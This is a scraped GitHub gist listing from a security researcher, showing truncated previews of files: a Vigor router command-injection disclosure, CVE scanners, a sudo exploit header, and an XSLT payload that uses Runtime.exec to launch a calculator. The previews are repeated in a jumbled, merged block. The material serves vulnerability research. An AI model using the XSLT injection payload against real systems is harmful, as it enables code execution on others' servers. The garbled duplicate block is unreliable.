swing WinMin

## Disclosure of vulnerabilities in Vigor2960 and Vigor3900.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              1 star
            
          
                WinMin
                / Disclosure of vulnerabilities in Vigor2960 and Vigor3900.md
            
            
              Last active
              August 18, 2022 08:27
            
              
                Disclosure of vulnerabilities in Vigor2960 and Vigor3900 
              
          
    Version

Vigor2960 fw1.5.1.1RC3 (r8167) Vigor3900 fw1.5.1.1beta_r8167
Vulnerability details

There are some command injection vulnerabilities in the mainfunction.cgi file. The details are as follows:
1. in downlaod_ovpn function


## wslport.ps1
param($port, $op='open', $protocol='tcp')

#Remove Firewall Exception Rules
Function removeFirewall(){
    Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' ";
    Invoke-Expression "netsh interface portproxy reset";
}


## smb-cve-2020-0796-scan.py
# author: @leommxj @swing
import socket, struct, sys, time
from functools import reduce


class Smb2Header:
    def __init__(self, command, message_id):
        self.protocol_id = "\xfeSMB"
        self.structure_size = "\x40\x00"  # Must be set to 0x40
        self.credit_charge = "\x00"*2

## ripple20-treck-scan.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
#author：swing
from scapy.all import *

ICMP_MS_SYNC_REQ_TYPE = 0xa5
ICMP_MS_SYNC_RSP_TYPE = 0xa6


def keep_icmp_handler(func):

## show_protocol.py
from scapy.all import *
from scapy.layers.http import *
import gdb


class ShowProcto(gdb.Command):
    """
    Usage: xpr/size memaddr procto_type
    Exaple:
    (gdb) xpr/20 0x7fffffffe238 TCP

## CVE-2021-3156-exploit.c
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <string.h>
/*
author: swing @ bestswngs@gmail.com

swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue

## theme.css
/* INSTALL:
 *
 * Put this file under the respective directory.
 * Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
 * Linux & MacOS: ~/.idapro/themes/monokai/theme.css
 *
 * In Options -> Colors change theme to monokai
 *
 * */
@importtheme "dark";

## msl.py
#!/usr/bin/env  python3
import docker
import os
import platform
import logging
import argparse

from distutils.dir_util import mkpath


## select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

## fgt_7.4.x_rootfs_decrypt.py
import magic
import r2pipe
import hashlib
import argparse
import subprocess
from unicorn import *
from unicorn.x86_const import *
# from udbserver import *    # uncomment this line if you want to debug

def pad_size(size):
	param($port, $op='open', $protocol='tcp')

	#Remove Firewall Exception Rules
	Function removeFirewall(){
	Invoke-Expression "Remove-NetFireWallRule -DisplayName 'WSL 2 Firewall Unlock *' ";
	Invoke-Expression "netsh interface portproxy reset";
	}
	# author: @leommxj @swing
	import socket, struct, sys, time
	from functools import reduce


	class Smb2Header:
	def __init__(self, command, message_id):
	self.protocol_id = "\xfeSMB"
	self.structure_size = "\x40\x00" # Must be set to 0x40
	self.credit_charge = "\x00"*2
	#!/usr/bin/python3
	# -- coding: utf-8 --
	#author：swing
	from scapy.all import *

	ICMP_MS_SYNC_REQ_TYPE = 0xa5
	ICMP_MS_SYNC_RSP_TYPE = 0xa6


	def keep_icmp_handler(func):
	from scapy.all import *
	from scapy.layers.http import *
	import gdb


	class ShowProcto(gdb.Command):
	"""
	Usage: xpr/size memaddr procto_type
	Exaple:
	(gdb) xpr/20 0x7fffffffe238 TCP
	#define _GNU_SOURCE
	#include <stdio.h>
	#include <unistd.h>
	#include <string.h>
	/*
	author: swing @ bestswngs@gmail.com

	swpwn-pd@ubuntu:~/glibc-2.31$ uname -a
	Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
	swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue
	/* INSTALL:
	*
	* Put this file under the respective directory.
	* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css
	* Linux & MacOS: ~/.idapro/themes/monokai/theme.css
	*
	* In Options -> Colors change theme to monokai
	*
	* */
	@importtheme "dark";
	#!/usr/bin/env python3
	import docker
	import os
	import platform
	import logging
	import argparse

	from distutils.dir_util import mkpath
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
	<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="<init>"/>
	import magic
	import r2pipe
	import hashlib
	import argparse
	import subprocess
	from unicorn import *
	from unicorn.x86_const import *
	# from udbserver import * # uncomment this line if you want to debug

	def pad_size(size):